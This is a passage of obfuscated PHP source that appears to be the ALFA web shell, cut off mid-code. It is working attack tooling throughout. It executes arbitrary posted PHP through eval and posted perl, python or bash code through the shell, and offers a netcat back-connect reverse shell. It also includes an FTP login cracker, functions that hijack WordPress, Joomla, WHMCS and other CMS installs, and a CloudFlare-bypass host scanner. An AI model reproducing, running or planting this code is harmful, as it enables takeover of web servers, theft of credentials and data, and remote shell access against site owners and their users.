2\67\143\157\127\x54\153\x49\x69\61\x6b\64\x54\127\x78\107\142\107\122\110\116\x76\x36\x30\132\x57\x61\123\167\x30\x61\x2b\x57\147\x4d\x74\141\154\125\x32\170\170\142\172\x55\x30\65\71\x6f\102\x31\x72\x79\166\x6c\120\57\x64\x47\x5a\x48\x5a\x52\146\x6c\x70\123\x53\64\x5a\112\x4d\65\123\106\164\x54\132\x75\x4d\x4f\x78\x52\x4d\x65\153\62\x37\107\61\147\106\x54\x59\x35\105\160\121\124\x30\151\x57\x41\x73\164\x6f\147\x4b\x74\x69\125\x58\x44\x5a\152\115\x53\x55\110\x45\107\x6d\x46\144\115\151\x55\x78\124\x59\123\x71\171\x59\x37\x64\x37\110\160\x39\x46\145\70\170\x69\x36\102\x30\x55\x41\x77\x65\x43\x79\147\x70\67\157\106\x54\156\x75\110\124\x6e\160\x46\125\154\142\121\x57\126\120\x47\x5a\x58\164\x39\154\112\53\121\x7a\111\x52\131\x68\141\170\171\x49\162\x76\x67\x70\x58\x62\x58\x56\x4f\62\x38\x75\163\x73\65\x54\x6d\163\71\154\x42\123\142\x48\x64\103\172\x54\106\155\106\x4f\x34\125\65\x55\120\153\105\154\70\x4d\x58\161\x68\145\130\123\63\x4d\x55\x36\53\x78\147\166\114\x33\x64\x43\166\x48\155\x77\104\x67\147\171\x4b\117\66\x71\x34\x32\x72\117\x71\x74\x79\157\162\x4e\x32\61\110\x72\x78\x77\152\125\x32\x2b\166\x44\157\x67\x35\x2b\156\101\x70\x39\x45\157\x76\x4a\156\67\103\131\57\104\x32\x4c\152\154\x37\x58\x58\142\63\145\145\121\x45\x55\x70\67\63\120\115\71\x37\162\x32\123\x36\147\x76\106\143\162\142\66\x31\x70\x36\53\131\x50\x69\x45\x6f\71\125\146\141\x33\61\x54\116\105\x4f\x53\x73\141\x50\123\x72\x76\x66\132\x62\151\141\60\x76\57\x6e\x6b\156\142\x39\x4c\x4e\162\62\60\x37\x75\x58\x72\x57\164\151\142\71\x50\62\53\x41\x48\141\61\71\x31\x30\x7a\63\125\x72\x59\x65\121\x36\126\143\x68\x65\x78\x45\150\x30\x30\70\x53\x4d\x76\60\153\x49\144\x4d\166\x4c\x6d\x53\66\65\53\x57\x74\x2f\171\143\x68\60\x2f\x2b\x45\153\120\x32\x4f\x52\x56\x38\150\x65\x32\156\x4e\53\x67\x55\x3d"; goto fPWIo; hfu2N: echo "\74\144\151\x76\40\143\154\141\163\x73\75\x68\x65\x61\x64\145\x72\x3e\74\143\145\x6e\x74\x65\x72\76\74\142\162\76\x3c\144\x69\x76\40\143\x6c\141\163\x73\x3d\47\x74\x78\164\x66\x6f\x6e\x74\x5f\150\x65\x61\x64\145\162\x27\x3e\174\x20\102\141\x63\x6b\40\103\157\x6e\156\x65\143\x74\x20\174\74\57\x64\151\166\76\x3c\x62\162\76\x3c\142\x72\76"; goto ObzMC; fb71r: echo "\x3c\57\163\x65\x6c\145\x63\164\76\x20\74\144\151\166\40\151\x64\x3d\x27\x62\143\151\x70\x41\143\x74\151\157\x6e\47\x20\x73\164\x79\x6c\145\75\47\144\151\163\x70\x6c\x61\171\72\x69\x6e\154\151\x6e\x65\x2d\x62\x6c\x6f\143\x6b\x3b\47\x3e\74\144\151\x76\x20\143\x6c\141\163\x73\x3d\x22\164\170\x74\x66\157\156\164\x22\x3e\111\120\x3a\x3c\57\x64\x69\166\76\x20\74\151\156\x70\x75\x74\x20\164\x79\x70\145\x3d\47\x74\x65\170\164\47\40\x73\x74\171\x6c\x65\x3d\47\164\145\170\164\x2d\141\154\151\x67\x6e\x3a\x63\145\156\164\x65\162\x3b\47\x20\156\x61\x6d\x65\75\47\163\145\x72\166\x65\x72\x27\x20\166\x61\154\x75\x65\x3d\x27" . $_SERVER["\x52\x45\115\x4f\x54\105\x5f\x41\x44\x44\x52"] . "\47\76\x3c\x2f\144\x69\x76\76\x20\x3c\144\x69\x76\40\x63\x6c\141\x73\x73\75\42\x74\x78\x74\x66\x6f\156\164\42\76\x50\157\162\164\x3a\40\x3c\57\x64\x69\166\x3e\x20\74\x69\x6e\160\x75\x74\x20\164\x79\x70\x65\x3d\x27\164\x65\170\164\x27\x20\x73\151\172\x65\x3d\x27\65\47\40\x73\x74\171\x6c\145\x3d\47\164\145\170\x74\x2d\141\154\x69\x67\156\x3a\x63\145\156\164\x65\162\73\x27\x20\x6e\x61\x6d\145\x3d\47\x70\157\162\x74\47\x20\x76\141\154\165\x65\75\x27\62\60\61\x32\x27\x3e\x20\74\x69\x6e\160\x75\x74\x20\x74\171\x70\x65\75\47\163\x75\x62\x6d\x69\x74\x27\x20\166\141\x6c\x75\x65\75\x27\x20\47\76\74\57\146\157\162\155\76\x3c\160\76\74\x64\x69\166\x20\x69\x64\75\47\142\x63\x53\x74\141\164\165\x73\47\x3e\x3c\x73\155\x61\154\x6c\76\x52\x75\x6e\40\x60\40\x3c\146\157\156\164\x20\x63\x6f\x6c\157\162\x3d\47\162\x65\x64\x27\76\x6e\143\x20\x2d\154\x20\55\x76\40\55\x70\40\160\157\162\x74\x3c\57\146\x6f\x6e\164\x3e\x20\140\x20\157\x6e\x20\171\x6f\165\162\x20\x63\x6f\x6d\x70\165\164\x65\162\40\x61\156\x64\x20\x70\162\145\x73\x73\40\140\40\x3c\x66\x6f\156\164\x20\143\x6f\154\157\162\x3d\x27\x72\x65\144\x27\x3e\x3e\76\x3c\x2f\146\157\156\x74\76\40\140\40\x62\165\x74\x74\157\156\x3c\x2f\163\x6d\141\154\x6c\76\x3c\x2f\x64\151\166\76\x3c\x2f\x70\x3e\74\x2f\143\145\x6e\x74\145\x72\x3e\74\57\x62\x3e\74\57\x66\157\156\x74\x3e\x3c\142\162\x3e"; goto WbLvW; n7bWx: $c = "\x74\x56\x4a\164\142\x39\x6f\x77\x45\x50\67\143\123\166\x30\120\x48\x70\61\141\160\57\x57\x41\x73\x4f\x30\x54\124\x61\127\x6f\x5a\x42\x4c\141\103\x68\x48\112\116\105\60\x62\151\154\114\110\116\113\x63\132\x47\x38\x56\155\147\x6b\x37\x72\x62\71\70\154\x42\x41\x72\132\x69\x2f\141\154\x55\x71\x7a\143\120\x66\146\x34\67\156\172\120\156\x59\114\x69\143\x70\x6b\x4a\143\155\126\x73\102\162\161\144\x58\x35\x38\x63\x6e\x2b\x35\x68\102\x61\x6a\x37\x33\70\102\115\x77\x6c\x30\x54\130\x4a\165\x4f\130\x53\x2b\x45\x2b\x51\x4e\165\x4e\x50\70\x6d\142\103\x4f\147\x68\101\125\70\x48\x56\x43\x4e\x77\106\111\x42\x56\161\x68\101\125\112\142\115\x55\x31\x43\60\x4e\116\x4c\151\x6e\152\x4f\x65\160\167\x57\65\x51\x50\120\67\154\66\x6e\x7a\x34\53\124\x34\x71\111\x77\x59\x78\x70\x6e\62\x33\104\x36\x36\62\x50\103\x53\111\64\111\126\x30\171\167\162\x45\x6c\101\x45\x53\150\170\155\x74\114\x7a\x76\145\x62\x33\x71\61\150\x47\60\104\x61\150\153\x6c\x73\65\x42\162\152\x33\x2f\130\124\x49\143\102\130\x48\x2f\x4b\142\104\x51\150\x66\126\x79\161\x35\127\150\161\144\126\101\x71\x34\x4c\x75\61\110\x48\62\x4f\107\x58\53\164\x71\x6c\53\106\126\130\123\x34\143\147\146\104\x43\x61\x4a\120\57\161\70\64\x52\x6c\166\70\63\x4a\141\106\62\x44\122\53\117\x5a\71\x45\x73\x57\x54\167\x4c\x39\154\x33\x5a\x6f\x6a\142\105\156\123\103\x30\x73\x4e\x78\x6a\70\153\x4a\x61\x65\x69\x4a\x70\120\x67\x59\x78\x53\x55\107\144\155\x5a\x5a\147\x59\145\x68\x4a\65\x52\166\127\61\x68\x52\x6c\x38\x59\122\x36\x7a\x41\x30\152\162\122\110\x61\x67\x4d\x55\71\x44\107\102\115\151\106\x63\x77\x61\x73\x75\63\112\x72\x6d\x73\124\x68\103\x6f\130\105\x74\x78\165\x66\145\171\156\156\x6f\x71\x72\x65\146\145\x6f\x4a\x55\63\110\x57\x65\151\x53\x2b\156\x4b\125\153\x46\x75\x6d\143\x52\114\155\121\x6b\x6a\170\x2b\x56\x53\x33\127\x65\x37\x4d\154\x5a\x73\x74\106\x44\x34\x6d\110\156\156\x76\x67\71\145\161\125\x61\171\x77\x37\x70\x79\x32\170\x4b\x6b\144\114\x34\x6d\x42\171\x36\x36\x32\x73\113\x4f\142\x39\115\110\113\71\x38\x35\146\150\x70\x38\110\61\x65\x62\53\117\111\x6f\x53\x6d\x34\x4b\123\x44\152\53\161\x59\156\x4c\x79\x43\126\164\62\164\x31\x45\x5a\x51\x58\152\x6b\57\70\121\150\x70\102\116\154\x70\53\57\x70\132\x74\x43\62\x33\164\x4c\111\x32\172\x4e\x36\x30\156\166\x65\104\113\120\121\127\x59\152\x68\x31\x69\x57\x50\x64\x4d\x69\67\x64\171\63\61\153\154\x2f\x32\x66\x47\172\105\115\x77\70\153\64\110\x69\x66\170\x54\x62\147\124\x6d\130\113\x74\154\x4f\x44\x32\162\x38\162\x57\x65\71\107\111\x4f\x59\x35\172\61\124\x31\x59\152\60\x70\124\70\67\53\x61\155\157\142\x6e\110\156\152\x50\157\x61\156\x5a\141\157\162\146\x4c\x77\75\x3d"; goto A7nOA; ZSPYk: foreach ($cbArr as $key => $val) { echo "\74\157\160\164\x69\x6f\x6e\40\x76\x61\154\x75\x65\75\x27{$key}\47\x20" . ($GLOBALS["\x73\171\163"] == "\x77\151\x6e" ? "\163\145\154\x65\x63\164\145\144" : '') . "\x3e{$val}\74\x2f\x6f\160\164\151\x6f\x6e\x3e"; } goto fb71r; Zt7M9: } goto B1TDg; YmHhB: function alfaphpeval() { goto DVuGb; VHE1U: echo "\74\144\151\x76\40\x63\154\x61\x73\163\x3d\x68\145\x61\x64\x65\162\x3e\x3c\103\x65\156\x74\x65\162\76\x3c\141\x20\150\x72\x65\x66\75\x6a\141\166\141\163\x63\x72\151\160\x74\72\x76\157\x69\144\x28\x30\x29\x20\x6f\x6e\x63\154\x69\143\153\75\x22\147\x28\x27\160\150\x70\145\166\141\x6c\x27\x2c\x6e\x75\154\154\x2c\47\47\54\x27\x69\156\x69\47\51\42\x3e\x7c\40\x49\x4e\111\137\111\x4e\106\117\40\x7c\x20\x3c\57\x61\x3e\74\141\x20\x68\162\145\146\75\152\141\x76\141\163\143\162\x69\x70\164\72\x76\157\x69\144\50\60\51\x20\x6f\x6e\143\x6c\151\x63\x6b\x3d\x22\x67\x28\x27\160\150\160\145\x76\x61\154\47\54\x6e\165\154\154\54\47\47\x2c\x27\x69\x6e\x66\157\47\51\42\x3e\x20\174\x20\160\x68\x70\151\x6e\146\157\40\174\x3c\x2f\141\76\x3c\141\40\x68\x72\x65\x66\x3d\152\x61\166\x61\163\x63\x72\x69\x70\x74\72\166\x6f\x69\144\x28\x30\x29\40\x6f\156\143\x6c\151\x63\x6b\x3d\x22\x67\50\47\160\150\x70\145\x76\141\x6c\x27\54\x6e\165\x6c\154\x2c\47\x27\54\47\x65\x78\x74\x65\x6e\47\x29\x22\x3e\40\174\40\x65\170\164\145\x6e\163\151\x6f\156\163\40\174\x3c\57\x61\x3e\74\57\x63\x65\156\164\145\162\76\x3c\142\x72\76\74\x66\x6f\162\x6d\40\156\x61\155\x65\x3d\160\146\40\x6d\x65\164\150\x6f\144\x3d\160\157\163\164\x20\x6f\156\163\165\142\x6d\151\164\75\x22\147\50\x27\160\x68\160\x65\166\141\154\47\x2c\x6e\x75\154\154\x2c\164\150\x69\x73\56\x63\157\144\x65\56\166\x61\154\x75\145\x2c\156\165\154\154\54\164\x68\x69\x73\56\154\x61\x6e\147\165\141\147\x65\x2e\166\141\x6c\x75\145\51\73\40\162\x65\x74\x75\x72\156\x20\146\141\x6c\163\145\73\x22\76\74\x64\x69\x76\40\143\x6c\x61\163\163\x3d\42\x74\170\164\146\157\156\164\x22\76\x53\145\154\x65\x63\x74\x20\114\x61\x6e\147\165\x61\147\145\x3a\x20\74\57\x64\x69\x76\x3e\x20\74\163\x65\x6c\x65\x63\164\x20\x6e\141\155\x65\75\42\154\x61\x6e\x67\x75\141\x67\x65\42\40\163\x74\171\x6c\x65\75\42\167\x69\x64\x74\150\72\x33\60\60\x70\170\x3b\42\x3e" . $lang_html . "\74\x2f\x73\145\x6c\145\143\164\x3e\x3c\142\162\76\x3c\x62\x72\x3e\x3c\164\145\x78\164\x61\x72\145\141\40\160\x6c\141\143\145\x68\157\x6c\x64\145\x72\75\x22\x66\x69\154\145\x5f\x67\x65\x74\x5f\x63\x6f\156\164\145\x6e\x74\x73\50\x27\57\145\164\x63\57\x70\141\x73\x73\167\144\x27\x29\73\x22\x20\156\x61\155\x65\x3d\143\157\x64\145\x20\x63\x6c\x61\x73\163\75\142\x69\147\x61\162\145\141\x20\x69\x64\75\120\x68\x70\x43\x6f\x64\145\76" . (!empty($_POST["\x61\x6c\146\x61\x31"]) ? htmlspecialchars($_POST["\141\154\x66\141\x31"]) : '') . "\x3c\57\164\145\x78\x74\x61\x72\x65\141\76\74\143\x65\x6e\164\x65\x72\x3e\74\151\x6e\x70\165\x74\x20\x74\171\x70\x65\75\42\163\x75\142\155\x69\164\x22\x20\166\x61\x6c\x75\x65\x3d\x22\42\x20\163\x74\x79\154\145\75\x22\x6d\141\x72\x67\x69\x6e\x2d\164\x6f\x70\72\65\160\170\42\x3e\74\57\x63\145\x6e\x74\x65\x72\76"; goto rWVQU; jbtJu: if (isset($_POST["\141\x6c\146\x61\62"]) && $_POST["\141\154\x66\x61\x32"] == "\151\x6e\x69") { goto NB92_; TG2Dr: $tmp = preg_replace("\x21\x74\144\x2c\40\164\x68\x20\173\50\x2e\52\51\x7d\41\x6d\x73\x69\x55", "\x2e\145\54\40\56\x76\x2c\x20\x2e\x68\54\40\x2e\150\x20\164\150\40\173\x24\x31\175", $tmp); goto ued13; SfTfu: print "\74\164\141\x62\x6c\x65\40\142\157\x72\144\145\x72\x3d\60\76\x3c\164\162\x3e" . "\74\164\144\x20\143\x6c\x61\x73\x73\75\42\154\x69\163\164\x69\x6e\147\x22\76\74\146\157\x6e\x74\x20\x63\154\141\x73\163\x3d\x22\x68\x69\x67\x68\154\x69\x67\150\164\x5f\164\170\164\x22\x3e\x50\141\x72\x61\155\x3c\57\x74\x64\x3e" . "\x3c\x74\144\x20\x63\154\141\x73\x73\75\x22\x6c\151\163\164\x69\x6e\147\42\76\x3c\146\x6f\156\164\x20\x63\154\x61\163\x73\75\42\x68\x69\147\x68\x6c\151\147\x68\x74\x5f\x74\170\x74\42\x3e\107\x6c\x6f\x62\x61\154\40\x76\x61\154\165\x65\x3c\x2f\x74\x64\x3e" . "\74\164\x64\x20\143\154\x61\163\163\x3d\x22\x6c\x69\x73\164\x69\156\x67\x22\76\x3c\146\x6f\156\x74\x20\143\154\x61\163\163\x3d\42\150\151\x67\150\154\x69\147\150\x74\137\x74\x78\164\x22\x3e\114\x6f\x63\x61\154\x20\126\x61\x6c\x75\145\x3c\57\x74\x64\x3e" . "\x3c\164\144\x20\x63\x6c\141\163\163\75\x22\x6c\151\x73\x74\151\x6e\x67\x22\76\74\146\157\156\x74\x20\143\154\x61\x73\163\75\42\x68\151\x67\150\154\151\x67\150\164\137\x74\x78\164\42\x3e\x41\143\143\145\163\163\x3c\57\x74\144\x3e\x3c\57\164\162\x3e"; goto aoyUt; T31Mx: ob_start(); goto Tia9H; V2WeS: $tmp = ob_get_clean(); goto wDebR; ued13: echo str_replace("\74\x68\61", "\x3c\x68\62", $tmp) . "\74\57\144\x69\166\76\74\x62\162\x3e"; goto y4w2I; NB92_: echo "\74\x64\151\x76\40\143\154\x61\x73\163\75\150\145\x61\144\x65\x72\76"; goto T31Mx; aoyUt: foreach ($INI as $param => $values) { print "\xa" . "\74\164\162\76" . "\x3c\x74\144\40\143\154\141\x73\163\x3d\42\x6c\x69\163\164\151\x6e\x67\42\76\74\142\76" . $param . "\x3c\x2f\164\144\76" . "\x3c\164\144\40\x63\x6c\141\163\x73\x3d\x22\154\151\163\x74\x69\x6e\147\42\x3e" . $values["\147\154\x6f\x62\x61\x6c\x5f\166\x61\154\x75\145"] . "\x20\x3c\x2f\164\144\76" . "\x3c\164\x64\x20\143\154\x61\x73\x73\75\42\x6c\151\163\x74\x69\156\x67\x22\76" . $values["\154\157\143\141\x6c\137\166\141\x6c\165\x65"] . "\40\x3c\x2f\164\x64\76" . "\74\x74\x64\40\x63\154\x61\x73\x73\x3d\x22\x6c\x69\x73\164\x69\x6e\147\x22\x3e" . $values["\141\143\143\x65\x73\x73"] . "\40\x3c\x2f\164\x64\76\74\x2f\164\162\x3e"; } goto V2WeS; wDebR: $tmp = preg_replace("\x21\x28\142\157\x64\171\174\141\x3a\x5c\167\x2b\x7c\142\x6f\144\171\54\x20\164\x64\54\x20\x74\x68\x2c\40\150\61\x2c\x20\150\x32\51\40\173\56\52\x7d\x21\155\163\151\125", '', $tmp); goto TG2Dr; Tia9H: $INI = ini_get_all(); goto SfTfu; y4w2I: } goto vFfCK; DVuGb: alfahead(); goto jbtJu; vFfCK: if (isset($_POST["\141\x6c\x66\141\x32"]) && $_POST["\x61\x6c\x66\141\62"] == "\x69\x6e\x66\157") { goto FMq4B; ItO_2: phpinfo(); goto Tezbg; ojcE9: $tmp = preg_replace("\41\x28\142\x6f\144\171\174\141\72\134\x77\x2b\x7c\142\x6f\144\171\x2c\40\x74\144\54\x20\164\150\54\40\x68\x31\54\x20\x68\x32\51\x20\x7b\56\52\x7d\x21\155\x73\x69\x55", '', $tmp); goto DYJRQ; DYJRQ: $tmp = preg_replace("\x21\x74\144\54\x20\x74\150\x20\x7b\50\56\x2a\51\175\x21\155\x73\151\125", "\x2e\x65\x2c\40\56\x76\x2c\x20\56\150\x2c\40\56\x68\x20\164\150\x20\173\44\x31\x7d", $tmp); goto gpgh3; pfhCQ: ob_start(); goto ItO_2; FMq4B: echo "\74\144\151\x76\x20\x63\154\x61\x73\x73\x3d\150\145\x61\144\x65\162\76\74\x73\164\171\154\x65\76\x2e\x70\x20\x7b\x63\157\x6c\157\162\x3a\x23\60\x30\x30\x3b\175\x3c\57\x73\164\x79\x6c\145\x3e"; goto pfhCQ; Tezbg: $tmp = ob_get_clean(); goto ojcE9; gpgh3: echo str_replace("\x3c\x68\x31", "\x3c\150\x32", $tmp) . "\x3c\x2f\144\151\166\76\74\x62\162\x3e"; goto MjTiJ; MjTiJ: } goto EGMLn; E0oqB: echo "\x3c\x2f\160\162\145\x3e\74\57\x64\151\166\76"; goto Q94fp; vKwfd: foreach (array("\160\x68\x70" => "\x70\150\160\40\176\x3e\x20\133\40\x57\x69\x6e\144\x6f\167\163\40\57\40\x4c\x69\156\165\x78\40\x5d", "\x70\145\162\154" => "\x70\x65\162\154\40\176\76\40\133\x20\x4c\151\156\165\x78\40\135", "\x70\x79\x74\x68\157\156" => "\160\x79\x74\150\x6f\x6e\x20\176\76\40\133\x20\x4c\x69\156\x75\170\x20\x5d", "\x62\x61\x73\150" => "\x62\x61\x73\x68\x20\176\x3e\x20\133\40\x4c\151\156\x75\x78\x20\135") as $key => $val) { $lang_html .= "\x3c\x6f\160\164\151\157\x6e\x20\166\141\154\x75\145\x3d\x22" . $key . "\42\40" . ($_POST["\141\154\x66\141\x33"] == $key ? "\x73\145\154\x65\143\164\x65\x64" : '') . "\x3e" . $val . "\74\x2f\x6f\x70\x74\151\x6f\x6e\76"; } goto VHE1U; mRTd8: $lang_html = ''; goto vKwfd; EGMLn: if (isset($_POST["\141\154\146\141\x32"]) && $_POST["\x61\x6c\146\x61\62"] == "\145\170\x74\x65\x6e") { goto mS0vW; DZYcg: $EXT = get_loaded_extensions(); goto P14nb; mS0vW: echo "\x3c\144\x69\x76\x20\x63\154\141\163\x73\75\150\145\141\144\x65\162\76"; goto A4eLG; A4eLG: ob_start(); goto DZYcg; P14nb: echo "\74\164\141\142\x6c\x65\x20\142\157\162\144\145\162\75\x30\x3e\74\164\x72\x3e\x3c\164\144\x20\x63\x6c\x61\x73\x73\x3d\42\154\151\163\164\x69\x6e\147\x22\x3e" . implode("\74\57\x74\144\76\74\x2f\164\162\76" . "\xa" . "\x3c\164\162\76\74\x74\x64\40\x63\x6c\x61\163\x73\75\x22\154\x69\x73\x74\x69\156\147\x22\76", $EXT) . "\x3c\57\164\144\76\x3c\57\164\162\76\x3c\57\164\141\142\x6c\145\76" . count($EXT) . "\40\x65\170\x74\x65\156\x73\x69\x6f\x6e\x73\x20\x6c\x6f\x61\x64\x65\x64"; goto gA3Fj; gA3Fj: echo "\74\57\144\151\166\76\x3c\x62\162\76"; goto RnxSZ; RnxSZ: } goto mRTd8; mkwE2: if (!empty($_POST["\x61\154\x66\141\61"])) { if ($_POST["\x61\x6c\x66\x61\x33"] == "\160\x68\160") { goto DNj2J; bKhZp: $result = htmlspecialchars(ob_get_clean()); goto oIw53; DNj2J: ob_start(); goto MIgFg; MIgFg: eval($_POST["\141\x6c\146\x61\61"]); goto bKhZp; oIw53: } elseif (_alfa_can_runCommand() && $GLOBALS["\x73\x79\x73"] == "\165\156\x69\x78") { goto SEo83; w7d3H: @unlink($filename); goto jhIql; eK33d: $lang = $_POST["\141\154\x66\x61\x33"]; goto wLyal; TmVgI: $result = alfaEx("\x6d\166\40{$filename}\40{$temp}\73{$lang}\x20{$temp}\x3b\162\155\40\x2d\x66\40{$temp}"); goto w7d3H; aZkpj: __write_file($filename, $_POST["\x61\x6c\x66\x61\61"]); goto TmVgI; jhIql: @unlink($temp); goto xSnii; wLyal: $filename = "\164\x65\x6d\x70" . rand(11111, 99999); goto e6UM9; SEo83: if (isset($_SESSION["\x65\x76\141\154\x5f\x74\x6d\x70\144\151\x72"])) { $tempdir = $_SESSION["\x65\166\x61\x6c\x5f\x74\155\160\144\151\162"]; } else { $tempdir = dirname(alfaEx("\155\x6b\x74\x65\155\160")); $_SESSION["\x65\x76\141\x6c\137\164\x6d\x70\x64\151\x72"] = $tempdir; } goto eK33d; e6UM9: $temp = $tempdir . "\x2f" . $filename; goto aZkpj; xSnii: } echo "\74\x74\145\170\x74\141\x72\x65\x61\x20\143\x6c\141\x73\163\75\x62\x69\147\x61\162\x65\141\40\151\144\x3d\42\120\150\160\103\157\144\145\x22\76" . $result . "\x3c\x2f\x74\145\x78\x74\141\x72\145\x61\76"; } goto E0oqB; Q94fp: alfafooter(); goto weJPP; rWVQU: echo "\x3c\x2f\146\x6f\x72\155\x3e\74\160\162\145\x20\151\144\75\120\150\x70\x4f\x75\164\x70\x75\164\x20\x73\164\171\x6c\x65\x3d\42" . (empty($_POST["\141\x6c\146\141\x31"]) ? "\144\151\x73\160\154\x61\x79\72\x6e\x6f\x6e\x65\x3b" : '') . "\x6d\141\162\x67\x69\156\55\x74\157\160\x3a\x35\x70\170\73\42\40\x63\154\x61\163\163\x3d\x6d\154\61\76"; goto mkwE2; weJPP: } goto yiHNT; D494U: function Alfa_FTP_Cracker($info) { goto ceJBP; WO3rC: curl_setopt($curl, CURLOPT_USERAGENT, "\x4d\157\172\151\154\x6c\x61\57\x35\x2e\60\x20\x28\x57\151\156\144\157\167\x73\x20\x4e\124\x20\66\x2e\x32\73\x20\x57\x4f\x57\66\x34\x3b\40\162\166\x3a\61\67\56\60\x29\40\x47\145\x63\153\x6f\x2f\x32\x30\61\x30\x30\x31\60\61\40\x46\x69\x72\x65\146\157\170\x2f\61\67\56\60"); goto BE0ke; ceJBP: $url = $info["\160\x72\157\164\157\x63\157\x6c"] . $info["\x74\141\x72\x67\145\164"]; goto fFI3e; XGwBG: $result = curl_exec($curl); goto F_8g9; F_8g9: $curl_errno = curl_errno($curl); goto jy_qv; Kmt0B: curl_close($curl); goto vU57K; UWMvF: if ($curl_errno > 0) { echo "\74\x66\x6f\x6e\164\x20\143\157\x6c\x6f\x72\x3d\x27\162\x65\144\x27\x3e\x45\x72\x72\157\x72\x3a\40{$curl_error}\x3c\57\146\x6f\156\x74\x3e\74\142\x72\x3e"; } elseif (preg_match("\57\x28\x5c\x64\53\51\72\50\134\144\53\x29\57\x69", $result)) { goto xtM6_; Z3XEV: $info["\x74\141\x72\147\145\164"] = $url; goto JT9KT; xtM6_: echo "\125\163\x65\x72\x4e\141\155\145\x3a\x20\x3c\146\157\x6e\x74\40\143\157\154\157\x72\x3d\42\x72\145\144\42\76" . $info["\x75\163\x65\162\156\x61\155\x65"] . "\74\x2f\x66\x6f\156\164\76\40\x50\141\x73\x73\127\157\x72\144\72\40\74\x66\x6f\x6e\x74\x20\143\x6f\x6c\x6f\162\75\42\x72\145\x64\x22\x3e" . $info["\x70\x61\x73\163\167\x6f\162\x64"] . "\x3c\57\x66\157\x6e\x74\76\x3c\146\157\156\164\x20\x63\x6f\x6c\x6f\x72\x3d\42\x67\x72\145\x65\x6e\42\76\40\x20\114\x6f\147\x69\x6e\40\123\165\x63\143\145\163\x73\x2e\56\x2e\x2e\x3c\x2f\x66\157\156\164\76\x3c\x62\x72\x3e"; goto Z3XEV; JT9KT: CrackerResualt($info); goto jTjQs; jTjQs: } goto Kmt0B; yn4EB: curl_setopt($curl, CURLOPT_USERPWD, '' . $info["\x75\163\145\x72\x6e\x61\155\x65"] . "\72" . $info["\x70\x61\163\x73\x77\157\162\x64"] . ''); goto XGwBG; jy_qv: $curl_error = curl_error($curl); goto UWMvF; fFI3e: $curl = curl_init(); goto zC2UK; BE0ke: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto yn4EB; zC2UK: curl_setopt($curl, CURLOPT_URL, $url); goto WO3rC; vU57K: } goto ceo7a; qXYAO: function alfaGetPathHistory() { echo isset($_SESSION[__PATH_HISTORY__]) && !empty($_SESSION[__PATH_HISTORY__]) ? $_SESSION[__PATH_HISTORY__] : $GLOBALS["\150\157\155\145\137\x63\x77\x64"]; } goto oBxdb; szIkW: $jgpUDiTPrk = "\x67" . "\172\151" . "\x6e\x66" . "\x6c" . "\x61\164" . "\145" . ''; goto nJoUD; SlYwg: function Alfa_Create_A_Tag($action, $vals) { $nulls = array(); foreach ($vals as $key => $val) { goto T0MRW; D7PO2: $f = implode("\x2c", $nulls); goto ih_7C; ih_7C: echo $f . "\x2c\x27" . $val[0] . "\x27\x29\73\x72\145\x74\165\x72\x6e\40\146\141\x6c\163\145\x3b\42\76\x7c\x20" . $key . "\x20\174\40\x3c\57\x61\x3e"; goto ZgISS; ZgISS: unset($nulls); goto CjETU; H8g8X: for ($i = 1; $i <= $val[1] - 1; $i++) { $nulls[] = "\x6e\x75\154\x6c"; } goto D7PO2; T0MRW: echo "\74\x61\x20\150\162\x65\146\x3d\x6a\x61\166\x61\163\143\x72\x69\160\x74\72\166\157\151\144\50\x30\51\x20\x6f\156\x63\154\151\x63\x6b\75\x22\x67\x28\47" . $action . "\x27\x2c"; goto H8g8X; CjETU: } } goto lrZ3X; udtXj: function clean_string($string) { if (function_exists("\x69\143\157\x6e\x76")) { $s = trim($string); $s = iconv("\125\124\106\55\70", "\x55\x54\x46\x2d\x38\57\x2f\x49\x47\x4e\x4f\122\x45", $s); } return $s; } goto Sr2OM; c16Cg: $GLOBALS["\143\x77\x64"] = isset($_SESSION[__LAST_CWD__]) && $_SESSION[__LAST_CWD__] != '' && !isset($_POST["\143"]) ? $_SESSION[__LAST_CWD__] : @getcwd(); goto L1bCG; dF_Vy: function alfaHijackCms($cms, $cmspath, $saveto) { switch ($cms) { case "\166\x62": hijackvBulletin($cmspath, $saveto); break; case "\167\160": hijackwp($cmspath, $saveto); break; case "\152\157\155": hijackJoomla($cmspath, $saveto); break; case "\167\150\155\x63\x73": hijackWhmcs($cmspath, $saveto); break; case "\x6d\x79\142\142": hijackMybb($cmspath, $saveto); break; case "\151\x70\142": hijackIPB($cmspath, $saveto); break; case "\x70\x68\x70\142\x62": hijackPHPBB($cmspath, $saveto); break; default: echo "\145\x72\x72\157\x72\41"; break; } } goto s1zW6; UpqQn: function alfacloudflare() { goto ed6IX; NNO9V: if ($_POST["\x61\154\x66\x61\62"] && $_POST["\141\154\x66\141\62"] == "\76\x3e") { goto dOYmW; hWfBW: if (preg_match("\57\136\50\150\164\164\160\163\77\x29\72\x5c\57\134\57\x28\x77\173\63\175\174\167\63\51\x5c\56\x2f\151", $url, $matches)) { if ($matches[2] != "\167\x77\x77") { $url = preg_replace("\x2f\x5e\50\150\164\164\160\x73\77\51\x3a\x5c\57\x5c\57\x2f", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } goto l4WnK; wpNkm: if (preg_match("\x2f\x63\154\157\x75\144\x66\154\x61\x72\x65\57\151", $server)) { echo "\12\x5b\x2b\x5d\40\103\154\157\165\144\106\x6c\x61\x72\x65\x20\144\145\x74\x65\x63\x74\145\x64\72\40{$server}\xa\74\142\x72\76"; } else { echo "\xa\133\53\135\x20\103\154\x6f\165\144\x46\154\141\x72\x65\40\x77\x61\x73\156\x27\164\40\144\x65\x74\145\x63\x74\145\144\54\x20\160\162\157\143\145\145\144\x69\x6e\x67\40\141\x6e\x79\x77\141\x79\56\xa"; } goto jVHkh; VIYH8: echo __pre(); goto wpNkm; qgSyt: for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "\50\116\165\154\x6c\51") { continue; } echo "\124\x72\171\x69\156\x67\x20{$site}\x3a\40{$ip}\xa\x3c\142\x72\x3e"; } goto gRkuu; dOYmW: $url = $_POST["\x61\154\x66\141\61"]; goto YhdOW; wTXup: echo "\133\53\x5d\40\123\x65\x61\162\x63\150\151\x6e\147\x20\146\157\162\40\155\157\x72\x65\40\111\120\x20\141\144\x64\x72\145\163\x73\145\x73\x2e\12\xa\74\142\x72\x3e\74\x62\162\76"; goto qgSyt; l4WnK: if 